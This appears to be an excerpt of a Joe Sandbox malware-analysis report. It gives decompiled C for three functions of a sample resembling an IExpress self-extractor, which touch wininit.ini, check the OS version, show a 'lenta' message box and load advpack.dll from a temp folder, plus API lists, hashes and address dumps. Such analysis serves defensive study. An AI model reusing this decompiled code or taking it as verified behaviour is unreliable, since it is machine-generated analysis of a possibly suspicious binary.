                                                                                                                                                                                                                                            • Opcode ID: 5dd9b33733a6134fc8fcedc9212ac86a0621f30e4472906338b0df425df045af
                                                                                                                                                                                                                                            • Instruction ID: 98318f727bb73aafedb58aeede02570f0399a171cc3d43f1c67c1eca53528564
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dd9b33733a6134fc8fcedc9212ac86a0621f30e4472906338b0df425df045af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E1187713002017BDF20EBB69D09E1B39F9EBD9B40B10452FB545D95E1DE7D88028664
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A924E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E00A9658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A92506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A9252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 00A9253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A9254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00A92555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A936EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0xa98184 = 1;
                                                                                                                                                                                                                                            						 *0xa98180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0xa99a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0xa98a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E00A92A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E00A92A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa98a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0xa98a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push("lenta");
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E00A9681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E00A967C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E00A928E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0xa99a40 = _t119;
                                                                                                                                                                                                                                            						 *0xa98184 = 1;
                                                                                                                                                                                                                                            						 *0xa98180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0xa99a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa98184 = _t135;
                                                                                                                                                                                                                                            							 *0xa98180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E00A944B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E00A96CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a9397d
                                                                                                                                                                                                                                            0x00a939a9
                                                                                                                                                                                                                                            0x00a9397f
                                                                                                                                                                                                                                            0x00a93982
                                                                                                                                                                                                                                            0x00a9398b
                                                                                                                                                                                                                                            0x00a9398d
                                                                                                                                                                                                                                            0x00a9398f
                                                                                                                                                                                                                                            0x00a9399f
                                                                                                                                                                                                                                            0x00a939a1
                                                                                                                                                                                                                                            0x00a93991
                                                                                                                                                                                                                                            0x00a93991
                                                                                                                                                                                                                                            0x00a93991
                                                                                                                                                                                                                                            0x00a9398f
                                                                                                                                                                                                                                            0x00a939af
                                                                                                                                                                                                                                            0x00a939b6
                                                                                                                                                                                                                                            0x00a93a0f
                                                                                                                                                                                                                                            0x00a93a0f
                                                                                                                                                                                                                                            0x00a93a11
                                                                                                                                                                                                                                            0x00a93a13
                                                                                                                                                                                                                                            0x00a93a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939b8
                                                                                                                                                                                                                                            0x00a939b8
                                                                                                                                                                                                                                            0x00a939ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939bc
                                                                                                                                                                                                                                            0x00a939bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939c3
                                                                                                                                                                                                                                            0x00a939c9
                                                                                                                                                                                                                                            0x00a939ce
                                                                                                                                                                                                                                            0x00a939d0
                                                                                                                                                                                                                                            0x00a939e3
                                                                                                                                                                                                                                            0x00a939e5
                                                                                                                                                                                                                                            0x00a939e6
                                                                                                                                                                                                                                            0x00a939f1
                                                                                                                                                                                                                                            0x00a939f7
                                                                                                                                                                                                                                            0x00a939fa
                                                                                                                                                                                                                                            0x00a93a01
                                                                                                                                                                                                                                            0x00a93a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93a06
                                                                                                                                                                                                                                            0x00a93a09
                                                                                                                                                                                                                                            0x00a93a09
                                                                                                                                                                                                                                            0x00a93a0b
                                                                                                                                                                                                                                            0x00a93a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93a09
                                                                                                                                                                                                                                            0x00a939fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939fc
                                                                                                                                                                                                                                            0x00a939d3
                                                                                                                                                                                                                                            0x00a939d8
                                                                                                                                                                                                                                            0x00a939da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939dc
                                                                                                                                                                                                                                            0x00a939b6
                                                                                                                                                                                                                                            0x00a93955
                                                                                                                                                                                                                                            0x00a9395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93961
                                                                                                                                                                                                                                            0x00a93963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93969
                                                                                                                                                                                                                                            0x00a93969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93969
                                                                                                                                                                                                                                            0x00a93915
                                                                                                                                                                                                                                            0x00a93915
                                                                                                                                                                                                                                            0x00a9391b
                                                                                                                                                                                                                                            0x00a9391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9392d
                                                                                                                                                                                                                                            0x00a93933
                                                                                                                                                                                                                                            0x00a93938
                                                                                                                                                                                                                                            0x00a9393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93940
                                                                                                                                                                                                                                            0x00a93946
                                                                                                                                                                                                                                            0x00a9394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a938f2
                                                                                                                                                                                                                                            0x00a93843
                                                                                                                                                                                                                                            0x00a93845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9384b
                                                                                                                                                                                                                                            0x00a9384d
                                                                                                                                                                                                                                            0x00a93883
                                                                                                                                                                                                                                            0x00a93885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9389a
                                                                                                                                                                                                                                            0x00a9389e
                                                                                                                                                                                                                                            0x00a9389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a938a0
                                                                                                                                                                                                                                            0x00a938a0
                                                                                                                                                                                                                                            0x00a938a2
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A93723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A939C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00A939F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$lenta
                                                                                                                                                                                                                                            • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                            • Opcode ID: 9a6bba05700e2930be552ffcbf9ad897ef89bfb4b3f8ba3da310e9a8380d442d
                                                                                                                                                                                                                                            • Instruction ID: 72ca25b0093826b213ea6c2f3dc6cd66d07a72061314878bf46ebda0ed51e08b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a6bba05700e2930be552ffcbf9ad897ef89bfb4b3f8ba3da310e9a8380d442d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2391F172B012249FEF34CB69CD90BAAB3F1EB45344F1541AAD88ADB251DB718F81CB41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E00A96495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E00A91781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E00A9658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A964DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A964F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A96502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
